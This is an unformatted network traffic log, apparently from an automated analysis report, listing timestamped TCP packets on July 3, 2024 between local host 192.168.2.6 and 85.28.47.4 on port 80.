                                                                Jul 3, 2024 08:38:18.664395094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664396048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.664407969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.664424896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665004015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665014982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665024996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665035009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665045023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665049076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665055990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665066957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665072918 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665076971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665087938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665091991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665097952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665107965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665115118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665123940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665132999 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665146112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665147066 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665157080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665169001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665173054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665179014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665185928 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665189981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.665218115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665225983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.665990114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666002035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666012049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666023016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666032076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666033030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666043997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666045904 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666054964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666065931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666074038 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666076899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666088104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666095018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666098118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666106939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666109085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666120052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666126966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666130066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666140079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666141033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666152000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666165113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666169882 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666176081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666186094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666196108 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666217089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666240931 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666861057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666872978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666882992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666893959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666901112 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666906118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666915894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666918993 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666927099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666944981 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666944981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.666961908 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.666971922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.748428106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748445988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748464108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748475075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748492002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748503923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748574972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748610020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748620033 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.748621941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748682976 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.748755932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748766899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748790979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.748826027 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.748862028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748873949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748889923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748895884 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.748900890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748912096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.748915911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.748936892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.748996973 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749151945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749162912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749174118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749183893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749186039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749195099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749206066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749207973 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749217033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749244928 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749300003 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749430895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749468088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749476910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749488115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749496937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749520063 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749535084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749723911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749735117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749744892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749756098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749758959 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749767065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749778986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749789953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749794006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749800920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749810934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749823093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.749830008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.749855042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750298977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750309944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750320911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750330925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750336885 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750340939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750351906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750361919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750372887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750374079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750382900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750392914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750408888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750410080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750432014 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750449896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750838995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750850916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750860929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750873089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750879049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750883102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750894070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750904083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750915051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750915051 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750926018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750936985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.750940084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750958920 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.750978947 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.751437902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751449108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751454115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751458883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751463890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751470089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751480103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751488924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751507044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751516104 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.751518965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751528978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751539946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751549959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751559973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751563072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.751570940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751581907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751586914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.751591921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751602888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751607895 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.751612902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.751631975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.751653910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.752404928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752415895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752427101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752438068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752448082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752453089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.752459049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752470016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752485991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752490997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.752497911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752510071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752516985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.752521038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752532005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752542019 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.752542973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752552986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752559900 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.752563000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752576113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.752578974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.752600908 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.753261089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753273010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753283024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753293037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753302097 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.753303051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753314018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753324986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753334999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753345013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753354073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.753355026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753365993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753376007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753386021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753393888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.753396034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753411055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753417015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.753421068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753431082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.753444910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.753467083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.754060984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.754071951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.754081011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.754091024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.754091978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.754127026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.754148006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.835336924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835465908 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.835572004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835582972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835592985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835602999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835612059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.835613012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835623980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835633993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835649967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835665941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.835695982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835712910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835720062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.835724115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835735083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835741997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.835769892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.835916042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835926056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835936069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835941076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.835962057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836004019 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836142063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836152077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836162090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836172104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836182117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836186886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836195946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836210966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836227894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836370945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836380959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836390972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836416006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836440086 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836445093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836456060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836466074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836477041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836477995 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836493015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836503983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836503983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836535931 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836849928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836865902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836875916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836885929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836885929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836896896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836906910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836914062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.836916924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.836946011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837308884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837318897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837328911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837340117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837349892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837351084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837369919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837371111 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837380886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837389946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837390900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837404013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837414026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837421894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837424994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837435007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837445021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837454081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837477922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837795973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837806940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837832928 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837855101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837923050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837934017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837944031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837954044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837958097 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837965012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837975979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837975979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.837985992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.837996960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.838006973 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.838006973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.838017941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.838027954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.838031054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.838048935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.838066101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.838608980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.838618994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.838634014 CEST804971085.28.47.4192.168.2.6
